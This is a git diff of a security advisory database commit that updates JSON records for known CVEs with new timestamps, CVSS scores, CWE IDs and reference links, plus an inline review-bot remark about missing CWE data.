.../GHSA-9x7h-v87g-j6jw.json | 11 +++--
.../GHSA-rr66-qxh8-8qwq.json | 11 +++--
.../GHSA-45gw-fx24-h4pv.json | 15 ++++--
.../GHSA-75wh-ww84-2q6c.json | 11 +++--
.../GHSA-4vjp-phjj-3f57.json | 6 ++-
.../GHSA-x2jm-xff2-34w4.json | 4 +-
.../GHSA-2886-9536-rhhj.json | 6 ++-
.../GHSA-rfj8-8392-mfcm.json | 6 ++-
.../GHSA-v6c5-9mp4-mwq4.json | 6 ++-
.../GHSA-5wfc-7v23-c2vf.json | 6 ++-
.../GHSA-5mc7-p6pj-r3f5.json | 6 ++-
.../GHSA-jh94-8q48-f3m3.json | 6 ++-
.../GHSA-qg84-jfh7-8hpx.json | 3 +-
.../GHSA-224f-wm46-5p4r.json | 33 +++++++++++++
.../GHSA-26vr-h5vf-58cq.json | 4 +-
.../GHSA-3669-8ww5-g35f.json | 44 +++++++++++++++++
.../GHSA-3q2x-q945-c5mm.json | 6 ++-
.../GHSA-4gg4-26q8-wv28.json | 37 ++++++++++++++
.../GHSA-5wr5-vxhh-x7gm.json | 44 +++++++++++++++++
.../GHSA-7v9f-f4qv-fcxh.json | 36 ++++++++++++++
.../GHSA-8xrx-9wj4-6775.json | 4 +-
.../GHSA-c5gm-v7v7-vjx9.json | 4 +-
.../GHSA-cgmm-x5ww-q5cr.json | 48 +++++++++++++++++++
.../GHSA-cm39-88fp-pv6j.json | 15 ++++--
.../GHSA-fq6p-4h82-858f.json | 29 +++++++++++
.../GHSA-fqf2-x743-9564.json | 4 +-
.../GHSA-h6jx-x5f4-qmj9.json | 15 ++++--
.../GHSA-h892-rh45-x8jp.json | 11 +++--
.../GHSA-j98c-62jj-x3h3.json | 29 +++++++++++
.../GHSA-jhq4-533p-8p4c.json | 15 ++++--
.../GHSA-m7rx-q9f3-3p96.json | 3 +-
.../GHSA-p47v-wp9g-8362.json | 15 ++++--
.../GHSA-p5cr-gq3j-93c4.json | 15 ++++--
.../GHSA-p5wr-5p37-2wm6.json | 6 ++-
.../GHSA-qqhc-37jx-7gh5.json | 40 ++++++++++++++++
.../GHSA-r3p8-h9vv-9cqc.json | 37 ++++++++++++++
.../GHSA-vwfj-gc28-j2fg.json | 40 ++++++++++++++++
.../GHSA-w7w9-2vjv-7r67.json | 40 ++++++++++++++++
.../GHSA-x3j4-874w-h7pv.json | 29 +++++++++++
.../GHSA-xrqq-m9vv-pq36.json | 15 ++++--
53 files changed, 730 insertions(+), 70 deletions(-)
create mode 100644 advisories/unreviewed/2026/02/GHSA-224f-wm46-5p4r/GHSA-224f-wm46-5p4r.json
create mode 100644 advisories/unreviewed/2026/02/GHSA-3669-8ww5-g35f/GHSA-3669-8ww5-g35f.json
create mode 100644 advisories/unreviewed/2026/02/GHSA-4gg4-26q8-wv28/GHSA-4gg4-26q8-wv28.json
create mode 100644 advisories/unreviewed/2026/02/GHSA-5wr5-vxhh-x7gm/GHSA-5wr5-vxhh-x7gm.json
create mode 100644 advisories/unreviewed/2026/02/GHSA-7v9f-f4qv-fcxh/GHSA-7v9f-f4qv-fcxh.json
create mode 100644 advisories/unreviewed/2026/02/GHSA-cgmm-x5ww-q5cr/GHSA-cgmm-x5ww-q5cr.json
create mode 100644 advisories/unreviewed/2026/02/GHSA-fq6p-4h82-858f/GHSA-fq6p-4h82-858f.json
create mode 100644 advisories/unreviewed/2026/02/GHSA-j98c-62jj-x3h3/GHSA-j98c-62jj-x3h3.json
create mode 100644 advisories/unreviewed/2026/02/GHSA-qqhc-37jx-7gh5/GHSA-qqhc-37jx-7gh5.json
create mode 100644 advisories/unreviewed/2026/02/GHSA-r3p8-h9vv-9cqc/GHSA-r3p8-h9vv-9cqc.json
create mode 100644 advisories/unreviewed/2026/02/GHSA-vwfj-gc28-j2fg/GHSA-vwfj-gc28-j2fg.json
create mode 100644 advisories/unreviewed/2026/02/GHSA-w7w9-2vjv-7r67/GHSA-w7w9-2vjv-7r67.json
create mode 100644 advisories/unreviewed/2026/02/GHSA-x3j4-874w-h7pv/GHSA-x3j4-874w-h7pv.json
diff --git a/advisories/unreviewed/2022/05/GHSA-23wj-fq4f-57vr/GHSA-23wj-fq4f-57vr.json b/advisories/unreviewed/2022/05/GHSA-23wj-fq4f-57vr/GHSA-23wj-fq4f-57vr.json
index 19f7f39ffbc3a..ed8de91296818 100644
--- a/advisories/unreviewed/2022/05/GHSA-23wj-fq4f-57vr/GHSA-23wj-fq4f-57vr.json
+++ b/advisories/unreviewed/2022/05/GHSA-23wj-fq4f-57vr/GHSA-23wj-fq4f-57vr.json
@@ -1,7 +1,7 @@
{
"schema_version": "1.4.0",
"id": "GHSA-23wj-fq4f-57vr",
- "modified": "2022-05-14T02:03:36Z",
+ "modified": "2026-02-13T18:31:21Z",
"published": "2022-05-14T02:03:36Z",
"aliases": [
"CVE-2018-15899"
@@ -22,6 +22,10 @@
{
"type": "WEB",
"url": "https://github.com/bg5sbk/MiniCMS/issues/21"
+ },
+ {
+ "type": "WEB",
+ "url": "https://github.com/MarkLee131/awesome-web-pocs/blob/main/CVE-2018-15899.md"
}
],
"database_specific": {
diff --git a/advisories/unreviewed/2022/05/GHSA-54jh-gr2j-w5jp/GHSA-54jh-gr2j-w5jp.json b/advisories/unreviewed/2022/05/GHSA-54jh-gr2j-w5jp/GHSA-54jh-gr2j-w5jp.json
index 16b452f6c8fef..20d62a664e145 100644
--- a/advisories/unreviewed/2022/05/GHSA-54jh-gr2j-w5jp/GHSA-54jh-gr2j-w5jp.json
+++ b/advisories/unreviewed/2022/05/GHSA-54jh-gr2j-w5jp/GHSA-54jh-gr2j-w5jp.json
@@ -1,13 +1,18 @@
{
"schema_version": "1.4.0",
"id": "GHSA-54jh-gr2j-w5jp",
- "modified": "2022-05-24T19:05:59Z",
+ "modified": "2026-02-13T18:31:21Z",
"published": "2022-05-24T19:05:59Z",
"aliases": [
"CVE-2021-35438"
],
"details": "phpIPAM 1.4.3 allows Reflected XSS via app/dashboard/widgets/ipcalc-result.php and app/tools/ip-calculator/result.php of the IP calculator.",
- "severity": [],
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N"
+ }
+ ],
"affected": [],
"references": [
{
@@ -17,6 +22,10 @@
{
"type": "WEB",
"url": "https://github.com/phpipam/phpipam/issues/3351"
+ },
+ {
+ "type": "WEB",
+ "url": "https://github.com/MarkLee131/awesome-web-pocs/blob/main/CVE-2021-35438.md"
}
],
"database_specific": {
diff --git a/advisories/unreviewed/2022/05/GHSA-9cr4-jvh8-pr25/GHSA-9cr4-jvh8-pr25.json b/advisories/unreviewed/2022/05/GHSA-9cr4-jvh8-pr25/GHSA-9cr4-jvh8-pr25.json
index 6c04751d31c4c..7f08fef4180f2 100644
--- a/advisories/unreviewed/2022/05/GHSA-9cr4-jvh8-pr25/GHSA-9cr4-jvh8-pr25.json
+++ b/advisories/unreviewed/2022/05/GHSA-9cr4-jvh8-pr25/GHSA-9cr4-jvh8-pr25.json
@@ -1,7 +1,7 @@
{
"schema_version": "1.4.0",
"id": "GHSA-9cr4-jvh8-pr25",
- "modified": "2022-05-17T02:54:58Z",
+ "modified": "2026-02-13T18:31:21Z",
"published": "2022-05-17T02:54:58Z",
"aliases": [
"CVE-2017-6537"
@@ -23,6 +23,10 @@
"type": "WEB",
"url": "https://github.com/WPO-Foundation/webpagetest/issues/837"
},
+ {
+ "type": "WEB",
+ "url": "https://github.com/MarkLee131/awesome-web-pocs/blob/main/CVE-2017-6537.md"
+ },
{
"type": "WEB",
"url": "http://www.securityfocus.com/bid/96935"
diff --git a/advisories/unreviewed/2022/05/GHSA-c6wh-345m-mrfm/GHSA-c6wh-345m-mrfm.json b/advisories/unreviewed/2022/05/GHSA-c6wh-345m-mrfm/GHSA-c6wh-345m-mrfm.json
index 2a3a2d6ac3379..cb6e77cd91868 100644
--- a/advisories/unreviewed/2022/05/GHSA-c6wh-345m-mrfm/GHSA-c6wh-345m-mrfm.json
+++ b/advisories/unreviewed/2022/05/GHSA-c6wh-345m-mrfm/GHSA-c6wh-345m-mrfm.json
@@ -1,7 +1,7 @@
{
"schema_version": "1.4.0",
"id": "GHSA-c6wh-345m-mrfm",
- "modified": "2022-05-17T02:56:29Z",
+ "modified": "2026-02-13T18:31:21Z",
"published": "2022-05-17T02:56:29Z",
"aliases": [
"CVE-2017-6396"
@@ -23,6 +23,10 @@
"type": "WEB",
"url": "https://github.com/WPO-Foundation/webpagetest/issues/820"
},
+ {
+ "type": "WEB",
+ "url": "https://github.com/MarkLee131/awesome-web-pocs/blob/main/CVE-2017-6396.md"
+ },
{
"type": "WEB",
"url": "http://www.securityfocus.com/bid/96553"
diff --git a/advisories/unreviewed/2022/05/GHSA-g4fr-g4v5-cfmc/GHSA-g4fr-g4v5-cfmc.json b/advisories/unreviewed/2022/05/GHSA-g4fr-g4v5-cfmc/GHSA-g4fr-g4v5-cfmc.json
index 2a156c1666c14..c1793f772b5f7 100644
--- a/advisories/unreviewed/2022/05/GHSA-g4fr-g4v5-cfmc/GHSA-g4fr-g4v5-cfmc.json
+++ b/advisories/unreviewed/2022/05/GHSA-g4fr-g4v5-cfmc/GHSA-g4fr-g4v5-cfmc.json
@@ -1,7 +1,7 @@
{
"schema_version": "1.4.0",
"id": "GHSA-g4fr-g4v5-cfmc",
- "modified": "2022-05-13T01:12:12Z",
+ "modified": "2026-02-13T18:31:21Z",
"published": "2022-05-13T01:12:12Z",
"aliases": [
"CVE-2017-6478"
@@ -23,6 +23,10 @@
"type": "WEB",
"url": "https://github.com/paintballrefjosh/MaNGOSWebV4/issues/15"
},
+ {
+ "type": "WEB",
+ "url": "https://github.com/MarkLee131/awesome-web-pocs/blob/main/CVE-2017-6478.md"
+ },
{
"type": "WEB",
"url": "https://github.com/paintballrefjosh/MaNGOSWebV4/releases/tag/4.0.8"
diff --git a/advisories/unreviewed/2022/05/GHSA-jgcm-pqcv-h934/GHSA-jgcm-pqcv-h934.json b/advisories/unreviewed/2022/05/GHSA-jgcm-pqcv-h934/GHSA-jgcm-pqcv-h934.json
index f56a19299b36b..2abd99ac4d2f4 100644
--- a/advisories/unreviewed/2022/05/GHSA-jgcm-pqcv-h934/GHSA-jgcm-pqcv-h934.json
+++ b/advisories/unreviewed/2022/05/GHSA-jgcm-pqcv-h934/GHSA-jgcm-pqcv-h934.json
@@ -1,7 +1,7 @@
{
"schema_version": "1.4.0",
"id": "GHSA-jgcm-pqcv-h934",
- "modified": "2022-05-17T02:54:55Z",
+ "modified": "2026-02-13T18:31:21Z",
"published": "2022-05-17T02:54:55Z",
"aliases": [
"CVE-2017-6541"
@@ -23,6 +23,10 @@
"type": "WEB",
"url": "https://github.com/WPO-Foundation/webpagetest/issues/834"
},
+ {
+ "type": "WEB",
+ "url": "https://github.com/MarkLee131/awesome-web-pocs/blob/main/CVE-2017-6541.md"
+ },
{
"type": "WEB",
"url": "http://www.securityfocus.com/bid/96935"
diff --git a/advisories/unreviewed/2023/02/GHSA-f6p2-2572-4pjp/GHSA-f6p2-2572-4pjp.json b/advisories/unreviewed/2023/02/GHSA-f6p2-2572-4pjp/GHSA-f6p2-2572-4pjp.json
index f819db96889f0..2ff58806de1a0 100644
--- a/advisories/unreviewed/2023/02/GHSA-f6p2-2572-4pjp/GHSA-f6p2-2572-4pjp.json
+++ b/advisories/unreviewed/2023/02/GHSA-f6p2-2572-4pjp/GHSA-f6p2-2572-4pjp.json
@@ -1,7 +1,7 @@
{
"schema_version": "1.4.0",
"id": "GHSA-f6p2-2572-4pjp",
- "modified": "2023-02-12T06:30:27Z",
+ "modified": "2026-02-13T18:31:21Z",
"published": "2023-02-04T15:30:32Z",
"aliases": [
"CVE-2023-0676"
@@ -23,6 +23,10 @@
"type": "WEB",
"url": "https://github.com/phpipam/phpipam/commit/94ec73ff1d33926b75b811ded6f0b4a46088a7ec"
},
+ {
+ "type": "WEB",
+ "url": "https://github.com/MarkLee131/awesome-web-pocs/blob/main/CVE-2023-0676.md"
+ },
{
"type": "WEB",
"url": "https://huntr.dev/bounties/b72d4f0c-8a96-4b40-a031-7d469c6ab93b"
diff --git a/advisories/unreviewed/2023/10/GHSA-m77w-6vjw-wh2f/GHSA-m77w-6vjw-wh2f.json b/advisories/unreviewed/2023/10/GHSA-m77w-6vjw-wh2f/GHSA-m77w-6vjw-wh2f.json
index ec1169bfc8af9..810870c8729ed 100644
--- a/advisories/unreviewed/2023/10/GHSA-m77w-6vjw-wh2f/GHSA-m77w-6vjw-wh2f.json
+++ b/advisories/unreviewed/2023/10/GHSA-m77w-6vjw-wh2f/GHSA-m77w-6vjw-wh2f.json
@@ -1,7 +1,7 @@
{
"schema_version": "1.4.0",
"id": "GHSA-m77w-6vjw-wh2f",
- "modified": "2025-10-22T00:32:51Z",
+ "modified": "2026-02-13T18:31:21Z",
"published": "2023-10-03T18:30:23Z",
"aliases": [
"CVE-2023-4911"
@@ -27,6 +27,10 @@
"type": "WEB",
"url": "https://www.qualys.com/2023/10/03/cve-2023-4911/looney-tunables-local-privilege-escalation-glibc-ld-so.txt"
},
+ {
+ "type": "WEB",
+ "url": "https://www.exploit-db.com/exploits/52479"
+ },
{
"type": "WEB",
"url": "https://www.debian.org/security/2023/dsa-5514"
diff --git a/advisories/unreviewed/2024/07/GHSA-2g3f-rmh8-cj3f/GHSA-2g3f-rmh8-cj3f.json b/advisories/unreviewed/2024/07/GHSA-2g3f-rmh8-cj3f/GHSA-2g3f-rmh8-cj3f.json
index 894979a1e4a75..8da2aba8e0444 100644
--- a/advisories/unreviewed/2024/07/GHSA-2g3f-rmh8-cj3f/GHSA-2g3f-rmh8-cj3f.json
+++ b/advisories/unreviewed/2024/07/GHSA-2g3f-rmh8-cj3f/GHSA-2g3f-rmh8-cj3f.json
@@ -1,7 +1,7 @@
{
"schema_version": "1.4.0",
"id": "GHSA-2g3f-rmh8-cj3f",
- "modified": "2024-08-01T15:32:11Z",
+ "modified": "2026-02-13T18:31:21Z",
"published": "2024-07-26T18:30:36Z",
"aliases": [
"CVE-2024-41355"
@@ -22,6 +22,10 @@
{
"type": "WEB",
"url": "https://github.com/phpipam/phpipam/issues/4151"
+ },
+ {
+ "type": "WEB",
+ "url": "https://github.com/MarkLee131/awesome-web-pocs/blob/main/CVE-2024-41355.md"
}
],
"database_specific": {
diff --git a/advisories/unreviewed/2024/08/GHSA-x34v-6wh4-m93r/GHSA-x34v-6wh4-m93r.json b/advisories/unreviewed/2024/08/GHSA-x34v-6wh4-m93r/GHSA-x34v-6wh4-m93r.json
index b0fd64a9bed9d..1b1ea338bedd4 100644
--- a/advisories/unreviewed/2024/08/GHSA-x34v-6wh4-m93r/GHSA-x34v-6wh4-m93r.json
+++ b/advisories/unreviewed/2024/08/GHSA-x34v-6wh4-m93r/GHSA-x34v-6wh4-m93r.json
@@ -1,7 +1,7 @@
{
"schema_version": "1.4.0",
"id": "GHSA-x34v-6wh4-m93r",
- "modified": "2024-08-28T18:31:54Z",
+ "modified": "2026-02-13T18:31:21Z",
"published": "2024-08-23T21:30:42Z",
"aliases": [
"CVE-2024-42845"
@@ -30,6 +30,10 @@
{
"type": "WEB",
"url": "https://github.com/partywavesec/invesalius3_vulnerabilities/tree/main/CVE-2024-42845"
+ },
+ {
+ "type": "WEB",
+ "url": "https://www.partywave.site/show/research/tic-tac-beware-of-your-scan"
}
],
"database_specific": {
diff --git a/advisories/unreviewed/2024/09/GHSA-5mqf-9q34-g8c2/GHSA-5mqf-9q34-g8c2.json b/advisories/unreviewed/2024/09/GHSA-5mqf-9q34-g8c2/GHSA-5mqf-9q34-g8c2.json
index 52ec270b94cbf..a31409f884714 100644
--- a/advisories/unreviewed/2024/09/GHSA-5mqf-9q34-g8c2/GHSA-5mqf-9q34-g8c2.json
+++ b/advisories/unreviewed/2024/09/GHSA-5mqf-9q34-g8c2/GHSA-5mqf-9q34-g8c2.json
@@ -1,7 +1,7 @@
{
"schema_version": "1.4.0",
"id": "GHSA-5mqf-9q34-g8c2",
- "modified": "2024-09-26T18:31:43Z",
+ "modified": "2026-02-13T18:31:21Z",
"published": "2024-09-25T18:31:20Z",
"aliases": [
"CVE-2024-44825"
@@ -26,6 +26,10 @@
{
"type": "WEB",
"url": "https://github.com/partywavesec/invesalius3_vulnerabilities/tree/main/CVE-2024-44825"
+ },
+ {
+ "type": "WEB",
+ "url": "https://www.partywave.site/show/research/cve-2024-44825-invesalius-arbitrary-file-write-and-directory-traversal"
}
],
"database_specific": {
diff --git a/advisories/unreviewed/2025/01/GHSA-9w8w-fgjg-w972/GHSA-9w8w-fgjg-w972.json b/advisories/unreviewed/2025/01/GHSA-9w8w-fgjg-w972/GHSA-9w8w-fgjg-w972.json
index 28cfa25dc6b48..4e6d01952c490 100644
--- a/advisories/unreviewed/2025/01/GHSA-9w8w-fgjg-w972/GHSA-9w8w-fgjg-w972.json
+++ b/advisories/unreviewed/2025/01/GHSA-9w8w-fgjg-w972/GHSA-9w8w-fgjg-w972.json
@@ -1,7 +1,7 @@
{
"schema_version": "1.4.0",
"id": "GHSA-9w8w-fgjg-w972",
- "modified": "2025-01-08T15:31:10Z",
+ "modified": "2026-02-13T18:31:21Z",
"published": "2025-01-07T21:30:55Z",
"aliases": [
"CVE-2024-54819"
@@ -26,6 +26,10 @@
{
"type": "WEB",
"url": "https://github.com/partywavesec/CVE-2024-55557"
+ },
+ {
+ "type": "WEB",
+ "url": "https://www.partywave.site/show/research/cve-2024-54819-i-librarian-server-side-request-forgery"
}
],
"database_specific": {
diff --git a/advisories/unreviewed/2025/03/GHSA-6v67-599p-fprc/GHSA-6v67-599p-fprc.json b/advisories/unreviewed/2025/03/GHSA-6v67-599p-fprc/GHSA-6v67-599p-fprc.json
index 0aa516242b13f..78e4b4b3a2e37 100644
--- a/advisories/unreviewed/2025/03/GHSA-6v67-599p-fprc/GHSA-6v67-599p-fprc.json
+++ b/advisories/unreviewed/2025/03/GHSA-6v67-599p-fprc/GHSA-6v67-599p-fprc.json
@@ -1,7 +1,7 @@
{
"schema_version": "1.4.0",
"id": "GHSA-6v67-599p-fprc",
- "modified": "2026-02-04T21:30:24Z",
+ "modified": "2026-02-13T18:31:21Z",
"published": "2025-03-11T18:32:17Z",
"aliases": [
"CVE-2025-24054"
@@ -31,6 +31,10 @@
"type": "WEB",
"url": "https://www.exploit-db.com/exploits/52478"
},
+ {
+ "type": "WEB",
+ "url": "https://www.exploit-db.com/exploits/52480"
+ },
{
"type": "WEB",
"url": "https://www.vicarius.io/vsociety/posts/cve-2025-24054-spoofing-vulnerability-in-windows-ntlm-by-microsoft-detection-script"
diff --git a/advisories/unreviewed/2025/04/GHSA-9x7h-v87g-j6jw/GHSA-9x7h-v87g-j6jw.json b/advisories/unreviewed/2025/04/GHSA-9x7h-v87g-j6jw/GHSA-9x7h-v87g-j6jw.json
index a606c1457cf8f..c1250f1d77225 100644
--- a/advisories/unreviewed/2025/04/GHSA-9x7h-v87g-j6jw/GHSA-9x7h-v87g-j6jw.json
+++ b/advisories/unreviewed/2025/04/GHSA-9x7h-v87g-j6jw/GHSA-9x7h-v87g-j6jw.json
@@ -1,13 +1,18 @@
{
"schema_version": "1.4.0",
"id": "GHSA-9x7h-v87g-j6jw",
- "modified": "2025-11-03T21:33:35Z",
+ "modified": "2026-02-13T18:31:21Z",
"published": "2025-04-16T15:34:40Z",
"aliases": [
"CVE-2025-22042"
],
"details": "In the Linux kernel, the following vulnerability has been resolved:\n\nksmbd: add bounds check for create lease context\n\nAdd missing bounds check for create lease context.",
- "severity": [],
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H"
+ }
+ ],
"affected": [],
"references": [
{
@@ -45,7 +50,7 @@
],
"database_specific": {
"cwe_ids": [],
- "severity": null,
+ "severity": "MODERATE",
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2025-04-16T15:15:57Z"
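Review bot: `cwe_ids` is left as `[]` two lines above the new `"severity": "MODERATE"`, even though a CVSS vector and a severity are now assigned, while the same commit populates `"CWE-416"` for GHSA-45gw-fx24-h4pv, so weakness data is evidently available upstream for at least some of these kernel records. If the NVD entry for CVE-2025-22042 names a CWE (a missing bounds check would typically map to CWE-125 or CWE-787), it should be carried over here rather than leaving the record half-enriched; the same applies to GHSA-rr66-qxh8-8qwq and GHSA-75wh-ww84-2q6c further down in this commit. If NVD genuinely records no CWE for them, the empty list is correct and nothing needs to change.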
diff --git a/advisories/unreviewed/2025/04/GHSA-rr66-qxh8-8qwq/GHSA-rr66-qxh8-8qwq.json b/advisories/unreviewed/2025/04/GHSA-rr66-qxh8-8qwq/GHSA-rr66-qxh8-8qwq.json
index 2d8112bee4640..b4113fb52372a 100644
--- a/advisories/unreviewed/2025/04/GHSA-rr66-qxh8-8qwq/GHSA-rr66-qxh8-8qwq.json
+++ b/advisories/unreviewed/2025/04/GHSA-rr66-qxh8-8qwq/GHSA-rr66-qxh8-8qwq.json
@@ -1,13 +1,18 @@
{
"schema_version": "1.4.0",
"id": "GHSA-rr66-qxh8-8qwq",
- "modified": "2025-11-03T21:33:41Z",
+ "modified": "2026-02-13T18:31:21Z",
"published": "2025-04-18T15:31:38Z",
"aliases": [
"CVE-2025-38575"
],
"details": "In the Linux kernel, the following vulnerability has been resolved:\n\nksmbd: use aead_request_free to match aead_request_alloc\n\nUse aead_request_free() instead of kfree() to properly free memory\nallocated by aead_request_alloc(). This ensures sensitive crypto data\nis zeroed before being freed.",
- "severity": [],
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H"
+ }
+ ],
"affected": [],
"references": [
{
@@ -49,7 +54,7 @@
],
"database_specific": {
"cwe_ids": [],
- "severity": null,
+ "severity": "MODERATE",
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2025-04-18T07:15:43Z"
diff --git a/advisories/unreviewed/2025/05/GHSA-45gw-fx24-h4pv/GHSA-45gw-fx24-h4pv.json b/advisories/unreviewed/2025/05/GHSA-45gw-fx24-h4pv/GHSA-45gw-fx24-h4pv.json
index 9c547ebccacdd..73b8e02f6ca39 100644
--- a/advisories/unreviewed/2025/05/GHSA-45gw-fx24-h4pv/GHSA-45gw-fx24-h4pv.json
+++ b/advisories/unreviewed/2025/05/GHSA-45gw-fx24-h4pv/GHSA-45gw-fx24-h4pv.json
@@ -1,13 +1,18 @@
{
"schema_version": "1.4.0",
"id": "GHSA-45gw-fx24-h4pv",
- "modified": "2025-11-03T21:33:45Z",
+ "modified": "2026-02-13T18:31:21Z",
"published": "2025-05-01T15:31:44Z",
"aliases": [
"CVE-2025-37778"
],
"details": "In the Linux kernel, the following vulnerability has been resolved:\n\nksmbd: Fix dangling pointer in krb_authenticate\n\nkrb_authenticate frees sess->user and does not set the pointer\nto NULL. It calls ksmbd_krb5_authenticate to reinitialise\nsess->user but that function may return without doing so. If\nthat happens then smb2_sess_setup, which calls krb_authenticate,\nwill be accessing free'd memory when it later uses sess->user.",
- "severity": [],
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"
+ }
+ ],
"affected": [],
"references": [
{
@@ -40,8 +45,10 @@
}
],
"database_specific": {
- "cwe_ids": [],
- "severity": null,
+ "cwe_ids": [
+ "CWE-416"
+ ],
+ "severity": "HIGH",
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2025-05-01T14:15:41Z"
diff --git a/advisories/unreviewed/2025/05/GHSA-75wh-ww84-2q6c/GHSA-75wh-ww84-2q6c.json b/advisories/unreviewed/2025/05/GHSA-75wh-ww84-2q6c/GHSA-75wh-ww84-2q6c.json
index cd01d81fe78dc..ba3496731c0c4 100644
--- a/advisories/unreviewed/2025/05/GHSA-75wh-ww84-2q6c/GHSA-75wh-ww84-2q6c.json
+++ b/advisories/unreviewed/2025/05/GHSA-75wh-ww84-2q6c/GHSA-75wh-ww84-2q6c.json
@@ -1,13 +1,18 @@
{
"schema_version": "1.4.0",
"id": "GHSA-75wh-ww84-2q6c",
- "modified": "2025-11-03T21:33:45Z",
+ "modified": "2026-02-13T18:31:21Z",
"published": "2025-05-01T15:31:44Z",
"aliases": [
"CVE-2025-37775"
],
"details": "In the Linux kernel, the following vulnerability has been resolved:\n\nksmbd: fix the warning from __kernel_write_iter\n\n[ 2110.972290] ------------[ cut here ]------------\n[ 2110.972301] WARNING: CPU: 3 PID: 735 at fs/read_write.c:599 __kernel_write_iter+0x21b/0x280\n\nThis patch doesn't allow writing to directory.",
- "severity": [],
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H"
+ }
+ ],
"affected": [],
"references": [
{
@@ -41,7 +46,7 @@
],
"database_specific": {
"cwe_ids": [],
- "severity": null,
+ "severity": "MODERATE",
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2025-05-01T14:15:41Z"
diff --git a/advisories/unreviewed/2025/08/GHSA-4vjp-phjj-3f57/GHSA-4vjp-phjj-3f57.json b/advisories/unreviewed/2025/08/GHSA-4vjp-phjj-3f57/GHSA-4vjp-phjj-3f57.json
index 72397ebf2061f..a72de6e88a2fd 100644
--- a/advisories/unreviewed/2025/08/GHSA-4vjp-phjj-3f57/GHSA-4vjp-phjj-3f57.json
+++ b/advisories/unreviewed/2025/08/GHSA-4vjp-phjj-3f57/GHSA-4vjp-phjj-3f57.json
@@ -1,7 +1,7 @@
{
"schema_version": "1.4.0",
"id": "GHSA-4vjp-phjj-3f57",
- "modified": "2025-11-05T00:31:24Z",
+ "modified": "2026-02-13T18:31:21Z",
"published": "2025-08-13T18:31:24Z",
"aliases": [
"CVE-2025-34153"
@@ -19,6 +19,10 @@
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2025-34153"
},
+ {
+ "type": "WEB",
+ "url": "https://community.hyland.com/resources/bulletins-and-notices/210540-security-update-hyland-timer-service-bulletin-ob2025-02"
+ },
{
"type": "WEB",
"url": "https://gist.github.com/VAMorales/32794cccc2195a935623a12ef32760dc"
diff --git a/advisories/unreviewed/2025/09/GHSA-x2jm-xff2-34w4/GHSA-x2jm-xff2-34w4.json b/advisories/unreviewed/2025/09/GHSA-x2jm-xff2-34w4/GHSA-x2jm-xff2-34w4.json
index a15e1d31feffe..988fb2d59f60f 100644
--- a/advisories/unreviewed/2025/09/GHSA-x2jm-xff2-34w4/GHSA-x2jm-xff2-34w4.json
+++ b/advisories/unreviewed/2025/09/GHSA-x2jm-xff2-34w4/GHSA-x2jm-xff2-34w4.json
@@ -25,7 +25,9 @@
}
],
"database_specific": {
- "cwe_ids": [],
+ "cwe_ids": [
+ "CWE-79"
+ ],
"severity": "MODERATE",
"github_reviewed": false,
"github_reviewed_at": null,
diff --git a/advisories/unreviewed/2025/11/GHSA-2886-9536-rhhj/GHSA-2886-9536-rhhj.json b/advisories/unreviewed/2025/11/GHSA-2886-9536-rhhj/GHSA-2886-9536-rhhj.json
index 36d4053526d62..e9c314581dda1 100644
--- a/advisories/unreviewed/2025/11/GHSA-2886-9536-rhhj/GHSA-2886-9536-rhhj.json
+++ b/advisories/unreviewed/2025/11/GHSA-2886-9536-rhhj/GHSA-2886-9536-rhhj.json
@@ -1,13 +1,17 @@
{
"schema_version": "1.4.0",
"id": "GHSA-2886-9536-rhhj",
- "modified": "2025-11-13T18:31:05Z",
+ "modified": "2026-02-13T18:31:22Z",
"published": "2025-11-13T18:31:05Z",
"aliases": [
"CVE-2025-12784"
],
"details": "Certain HP LaserJet Pro printers may be vulnerable to information disclosure leading to credential exposure by altering the scan/send destination address and/or modifying the LDAP Server.",
"severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:N/A:N"
+ },
{
"type": "CVSS_V4",
"score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X"
diff --git a/advisories/unreviewed/2025/11/GHSA-rfj8-8392-mfcm/GHSA-rfj8-8392-mfcm.json b/advisories/unreviewed/2025/11/GHSA-rfj8-8392-mfcm/GHSA-rfj8-8392-mfcm.json
index 81e7266466163..b3ec5d510064b 100644
--- a/advisories/unreviewed/2025/11/GHSA-rfj8-8392-mfcm/GHSA-rfj8-8392-mfcm.json
+++ b/advisories/unreviewed/2025/11/GHSA-rfj8-8392-mfcm/GHSA-rfj8-8392-mfcm.json
@@ -1,13 +1,17 @@
{
"schema_version": "1.4.0",
"id": "GHSA-rfj8-8392-mfcm",
- "modified": "2025-11-13T18:31:05Z",
+ "modified": "2026-02-13T18:31:22Z",
"published": "2025-11-13T18:31:05Z",
"aliases": [
"CVE-2025-12785"
],
"details": "Certain HP LaserJet Pro printers may be vulnerable to information disclosure leading to credential exposure by altering the scan/send destination address and/or modifying the LDAP Server.",
"severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N"
+ },
{
"type": "CVSS_V4",
